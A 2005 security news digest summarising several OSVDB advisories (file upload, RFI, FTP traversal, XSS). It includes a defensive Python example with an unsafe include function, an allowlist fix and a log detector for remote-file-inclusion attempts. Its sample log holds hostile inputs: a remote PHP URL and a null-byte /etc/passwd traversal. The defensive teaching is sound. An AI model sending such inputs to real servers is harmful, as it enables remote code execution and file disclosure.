Network Security News – Friday, July 08, 2005 Events
Unify eWave ServletExec UploadServlet Unprivileged File Upload
ServletExec contains a flaw that may allow a remote attacker to upload arbitrary files. The problem is that the application does not restrict access to the 'com.unify.ewave.servletexec.UploadServlet' servlet. A remote attacker can build an HTML (multipart) form that posts to this servlet, upload JSP files into the web root and have the server execute them, resulting in arbitrary command execution and a loss of integrity. Read more at osvdb.org/469
Unify eWave ServletExec GET /servlet/ Request DoS
ServletExec contains a flaw that may allow a remote denial of service. The issue is triggered by a specially crafted HTTP GET request containing the '/servlet/' string, which causes the servlet engine to crash, resulting in a loss of availability. Read more at osvdb.org/17769
Access Remote PC Registry Cleartext User Credential Disclosure
Access Remote PC contains a flaw that may lead to unauthorized password exposure. The RPC Subscription Service passwords can be recovered by reading the 'HKEY_LOCAL_MACHINE\Software\Access Remote PC\Server\Proxy\RPCNumber' and 'HKEY_LOCAL_MACHINE\Software\Access Remote PC\Server\Proxy\Password' registry values, which store those passwords in cleartext rather than encrypted. Any local user able to read that part of the registry can obtain them. Read more at osvdb.org/17749
Mark Kronsbein MyGuestbook form.inc.php3 lang Variable Remote File Inclusion
Mark Kronsbein MyGuestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to "form.inc.php3" not properly validating user input supplied in the "lang" variable before using it as an include path. This may allow an attacker to include a file from a remote host that contains arbitrary PHP code, which is then executed by the vulnerable script with the web server's privileges. Read more at osvdb.org/17750
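The include-path pattern behind this class of bug, and the two things a practitioner usually wants around it: the hardened resolver (an allowlist that maps a client-chosen key to a server-chosen path, instead of sanitising the raw string) and a detector that flags remote-file-inclusion attempts in access logs. This is an added example, not MyGuestbook's own code. The language directory, the set of available languages and the log lines are constructed for the demonstration.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed layout for the example; MyGuestbook's real paths are not known here.
LANG_DIR = "/var/www/myguestbook/lang"
AVAILABLE_LANGS = frozenset({"de", "en", "fr"})
LANG_RE = re.compile(r"^[a-z]{2}$")


def unsafe_include_target(lang):
    """The flawed pattern: the client value becomes the include target verbatim.

    With a URL, PHP's include() fetches it remotely (when URL includes are
    enabled); a trailing '?' pushes the server-side suffix into the query
    string of the attacker's URL, so the remote file is fetched unchanged.
    """
    return lang + ".inc.php3"


def safe_include_target(lang, default="en"):
    """Allowlist, do not sanitise: only a known key selects a file, and the
    path is assembled server-side from a fixed directory."""
    if not (lang and LANG_RE.fullmatch(lang) and lang in AVAILABLE_LANGS):
        lang = default
    return os.path.join(LANG_DIR, lang + ".inc.php3")


# URL schemes ("http://", "php://"), scheme-relative "//host", traversal
# sequences and null-byte truncation are the markers of an inclusion attempt.
RFI_MARKERS = re.compile(
    r"^(?:[a-z][a-z0-9+.-]*:)?//|^data:|\.\./|\.\.\\|%00|\x00", re.IGNORECASE
)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_rfi_attempts(log_lines, param="lang"):
    """Return (client_ip, decoded_value) for every request whose `param`
    value carries an RFI marker. Lines are Common Log Format."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            # parse_qs decoded once; decode again to catch double-encoding.
            decoded = unquote(value)
            if RFI_MARKERS.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Jul/2005:10:12:01 +0000] "GET /guestbook/form.inc.php3?lang=de HTTP/1.0" 200 512',
    '198.51.100.7 - - [08/Jul/2005:10:12:44 +0000] "GET /guestbook/form.inc.php3?lang=http://198.51.100.7/x.txt? HTTP/1.0" 200 802',
    '198.51.100.7 - - [08/Jul/2005:10:13:02 +0000] "GET /guestbook/form.inc.php3?lang=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.0" 200 1203',
    '192.0.2.9 - - [08/Jul/2005:10:14:30 +0000] "POST /guestbook/add.php3 HTTP/1.0" 302 0',
]

if __name__ == "__main__":
    print(unsafe_include_target("http://198.51.100.7/x.txt?"))
    print(safe_include_target("http://198.51.100.7/x.txt?"))
    for ip, value in flag_rfi_attempts(SAMPLE_LOG):
        print("RFI attempt from", ip, repr(value))
```

The detector deliberately does not try to decide whether the include succeeded; a 200 on a request whose `lang` value is a URL is the signal worth alerting on, and the allowlist resolver is what makes such a request harmless.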
Broker FTP LIST Command Traversal Arbitrary Directory Listing
Broker FTP server contains a flaw that allows a remote attacker to list and retrieve files outside of the FTP root directory. The issue is due to the server not properly sanitizing user input, specifically directory traversal sequences (../../) supplied as the argument to the 'LIST' or 'DIR' FTP commands. Read more at osvdb.org/17755
Broker FTP DELETE Command Traversal Arbitrary File Deletion
Broker FTP server contains a flaw that allows a remote attacker to delete files outside of the FTP root directory. The issue is due to the server not properly sanitizing user input, specifically directory traversal sequences (../../) supplied as the argument to the DELETE (DELE) FTP command. Read more at osvdb.org/455
Opera URL Redirection XSS
Opera contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the browser does not validate the content of the temporary page it generates to display a redirection when the 'Automatic redirection' option is disabled. This allows an attacker to craft a URL whose redirect target is rendered unescaped in that page, executing arbitrary script in the victim's browser within the trust relationship between the browser and the redirecting server, leading to a loss of integrity. Read more at osvdb.org/17580